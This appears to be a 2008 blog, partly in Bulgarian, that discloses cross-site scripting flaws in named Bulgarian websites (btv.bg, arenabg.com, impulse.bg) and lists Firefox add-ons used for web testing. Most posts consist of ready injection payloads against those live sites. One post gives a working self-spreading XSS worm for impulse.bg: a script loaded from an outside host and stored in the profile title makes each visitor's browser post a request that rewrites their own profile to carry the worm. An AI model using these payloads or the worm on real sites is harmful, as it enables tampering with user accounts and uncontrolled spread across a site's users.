new btv.bg multiple xss issues

Posted on 29 February, 2008 by nigon

new year, new site, new…xsses
http://www.btv.bg/horoscope/daily_horoscope.pcgi?sign_id=
“][/img][/h3][script]alert(‘nigonized’)[/script]<!—
search box xss vuln:
“][script]alert(‘nigonized’)[/script]<!—
to be continued….

Filed under: XSS, coding, security, web | Leave a Comment »

ff’s grand sixteen

Posted on 19 February, 2008 by nigon

HackBar [ https://addons.mozilla.org/en-US/firefox/addon/3899 ]
FireBug [ https://addons.mozilla.org/en-US/firefox/addon/1843 ]
Anonymouser [ https://addons.mozilla.org/en-US/firefox/addon/1415 ]
Whois [ https://addons.mozilla.org/en-US/firefox/addon/603 ]
Web Developer [ https://addons.mozilla.org/en-US/firefox/addon/60 ]
SwitchProxy Tool [https://addons.mozilla.org/en-US/firefox/addon/125]
Foxy Proxy [ https://addons.mozilla.org/en-US/firefox/addon/2464 ]
Reload Every [https://addons.mozilla.org/en-US/firefox/addon/115]
User Agent Switcher [ https://addons.mozilla.org/en-US/firefox/addon/59 ]
View Cookies [ https://addons.mozilla.org/en-US/firefox/addon/3587 ]
Modify Headers [ https://addons.mozilla.org/en-US/firefox/addon/967 ]
TiX Now! [https://addons.mozilla.org/en-US/firefox/addon/3601]
Wmlbrowser [ https://addons.mozilla.org/en-US/firefox/addon/62 ]
XSSMe [http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi]
SQL [...]

Filed under: XSS, firefox, security, web | Leave a Comment »

worming impulse.bg

Posted on 6 February, 2008 by nigon

impulse.bg позволява използването на HTML в “title”, точно както прави myspace.com с малката разлика, че няма забрани.
Веднага прави впечатление, това:
GET /js/scriptaculous/scriptaculous.js
което само по себе си прави нашето занимание по-лесно и красиво. Поставяйки в “Заглавие” полето нещо от рода на:
{script src=”www.mysite.com/impulse.js”}{/script}

impulse.js contents:

var params = “name=wormy!&email=nigon.hacked.in%40gmail.com&country=1&city_id=5&
city=&birthday=11&birthmonth=8&birthyear=1980&gender=1&
search_gender=2&height=0&weight=0&eyes=0&hair=0&
occupation=0&smoke=1&alchohol=1&title=%3Cscript%20src
%3D%22http%3A%2F%2Fmysite.com/impulse.js%22%3E%3C%2Fscript%3E&
info=&msg_report=1&comment_report=1&
Submit=%D0%9F%D1%80%D0%BE%D0%BC%D0%B5%D0%BD%D0%B8″;
var MyAjax = new Ajax.Request (‘/myinfo’, {
method: ‘post’,
parameters: params
});
резултат:
при всяко посещение [...]

Filed under: XSS, security, web | 1 Comment »

ArenaBG XSS

Posted on 30 November, 2007 by nigon

Нищо особено…
http://arenabg.com/series.php?q=
“>’>alert(String.fromCharCode(110,105,103,111,110,105,122,101,100))

Filed under: XSS, security | Leave a Comment »